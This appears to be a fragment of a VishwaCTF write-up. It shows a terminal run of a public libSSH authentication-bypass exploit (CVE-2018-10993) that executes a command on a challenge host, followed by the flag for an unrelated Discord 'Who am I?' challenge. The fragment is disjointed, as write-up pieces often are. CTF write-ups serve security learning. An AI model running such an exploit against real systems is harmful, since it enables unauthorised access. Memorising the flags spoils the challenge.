3
4
5
6
7
8
└─$ python cve-2018-10993.py 13.234.11.113 -p 32657 -c 'cat location.txt'
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v0.1
elrow-club-pune
Who am I? [Misc]
Question: Find me on the discord to get your flag
Flag: VishwaCTF{1_4m_n0t_4n0nym0u5_4nym0r3}
Just locate the challenge author on Discord.